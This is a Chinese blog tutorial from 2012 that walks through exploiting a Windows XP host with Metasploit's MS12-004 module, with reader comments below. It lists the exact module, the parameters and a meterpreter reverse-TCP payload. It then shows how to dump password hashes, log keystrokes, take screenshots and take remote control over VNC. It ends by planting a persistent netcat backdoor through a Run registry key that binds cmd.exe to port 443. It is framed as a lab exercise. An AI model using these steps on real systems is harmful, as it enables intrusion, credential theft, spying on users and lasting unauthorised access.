利用Metasploit进行渗透测试

利用Metasploit进行渗透测试

声明:本教程仅限供广大网络安全爱好者交流学习之用,任何人不得用于非法用途,否则后果自负。

最近在玩Backtrack 5 ,就把最近学到的东西分享下。

所有工具都是Backtrack 5 自带的,

用到的工具 : 大名鼎鼎的Metasploit Feamwork    还有 Netcat

要利用的漏洞:MS12-004 ,虽然漏洞是几个月前出的了,但这里只做渗透演示,重点在讲解工具的使用方法。

废话不说,看步骤 :

 

在控制台执行 msfconsole 启动Metasploit  ,

 

输入命令 search ms12_004,我们来找找ms12-004漏洞的利用模块

 

已经找到了,接下来使用该模块

输入命令  Use exploits/windows/browser/ms12_004_midi

 

接下来输入命令 show options ,显示该漏洞的基本信息,以及要设置的参数

 

设置参数:

输入命令 : set  SRVHOST  192.168.42.139

Set  PAYLOAD  windows/meterpreter/reverse_tcp

Set  LHOST  192.168.42.130

Set  URIOATH  /

 

最后 再输入show options ,查看是否设置好

 

已经OK了,开始渗透。

执行命令 :Exploit

 

可以看到服务已经启动了,链接地址http://192.168.42.130:8080/

在用Xp打开恶意链接地址 http://192.168.42.130:8080/

 

BackTrack 开始渗透,

这边BT5已经有反应了 ,渗透成功~

 

输入命令 Sessions

 

我们看到有一个会话,会话的 ID 是1  ,开打开这个会话

输入命令 Sessions  -i  1 这时,我们已经进入了Meterpreter

 

 

Meterpreter 是一个很强大的 payload , 具体说明输入 help 可以看到,

Meterpreter  >  hashdump     // 可以看到远程主机帐号和加密后的密码

这里再说几个常用的Meterpreter  命令

 

Meterpreter  >  keyscan_start   //开启键盘记录

 

Meterpreter  >  heyscan_dump  //  查看键盘记录的内容

Meterpreter  >  keyscan_stop    //  关闭键盘记录

Meterpreter  >  shell   //看下图大家都懂的

Meterpreter  > ps  //  获取远程主机进程列表,比windows自带的任务管理器清晰多了

Meterpreter  > screenshot   //  截取远程桌面屏幕

Meterpreter  > run vnc  // 开启远程主机vnc 服务

过一会,可以看到桌面,并且可以控制鼠标和键盘

 

好,下来我们来留后门,方便以后常来 ~

先上传 nc.exe(netcant)到windows的systen32文件夹下

Upload   /pentest/windows-binaries/tools/nc.exe   c:\windows\system32

 

已经成功了,下来我们将nc.exe加到注册表,让他开机自启动

 

先查看注册表

Reg  enumkey  -k  HKLM\SOFTWARE\Miorosoft\Windows\CurrentVersion\Run

已经可以看到注册表键值了

下来加入注册表

Reg  setval  -k  HKLM\SOFTWARE\Miorosoft\Windows\CurrentVersion\Run  -v  backdoor  -d  c:\windows\system32\nc.exe”-L  -d  -p  443  cmd.exe”

(上面是一条命令)

提示成功,看看XP的注册表

已经有了这个键值

我们重启远程主机试下

输命令 reboot

由于远程主机已经关闭,显示链接断开 ,等xp重启后,我们试试留的后门

Telnet   192.168.42.139   443

已经连接成功了  : )  .。刚接触BT5,各位见笑了  … 论坛有玩B5或者 Metasploit 的朋友可以联系我,求交流。

QQ :791628659

                                                                                          By  Breaker

本文地址http://0x7c00.cn/?p=165

2012年4月10日11:34:16

分享到:

14 条评论

昵称
  1. 道光

    大神,好棒~~~~~~~~~~

    1. Breaker

      你是?

    2. Breaker

      XZ 逗比

  2. Breaker

    测试

  3. beni

    大神 设置参数:

    输入命令 : set SRVHOST 192.168.42.139

    这段,SVRHOST 192.168.42.139是不是对方IP,但是你截图上面的IP是130的啊 ?

    1. Breaker

      svrhost是自己的ip

  4. beni

    这个漏洞是不是微软已经封了,大多数电脑这个补丁打了是不是都没用了呢

    1. Breaker

      是的

  5. 不曾离去

    大神,用ettercap,需要开启内核转发,但是提示ip forwarding was disabled,but we can’t re re enble it now ,remember to re -enble it manually.这意思我懂,但是怎么加入内核转发?求教

    1. Breaker

      我记得是 用echo 1 >/proc/sys/net/ipv4/ip_forward 开转发

      1. 不曾离去

        是的,我没有写错,但不知道哪里问题,转发不了,开启失败,就提示上面的字

        1. Breaker

          没有遇到过这样的问题 我在网上找到了相关资料,你试试
          // Using sysctl:
          sysctl net.ipv4.ip_forward
          net.ipv4.ip_forward = 0

          //或者 just checking out the value in the /proc system
          cat /proc/sys/net/ipv4/ip_forward
          0
          //打开ip forwarding
          sysctl -w net.ipv4.ip_forward=1
          //同样的或者
          echo 1 > /proc/sys/net/ipv4/ip_forward

          //这样的设置只是一次性的。我们可以永久的设置成打开。如下:
          //将文件设置/etc/sysctl.conf:
          net.ipv4.ip_forward = 1
          //如果已经将ip forwarding由0设置为1。为了使它生效。我们执行如下的命令。
          sysctl -p /etc/sysctl.conf

          //RedHat中执行如下:
          service network restart

          //Ubuntu/Debian系统则重启procps服务
          /etc/init.d/procps.sh restart

  6. 不曾离去

    用这些工具侵入cmcc,cmcc edu 这样的wifi可以给正在浏览网页的用户插入html广告么?这样做会不会被移动给发现查水表呢?这样很容易实现吗?对于我这样的小白很难吧?在手机上插入html代码很简单,但是电脑上就不会了,大神求指导

    1. Breaker

      这些都是用作模拟测试的,在现实生活中搞这些东西肯定会被查水表,尤其像这种天朝某移动公司。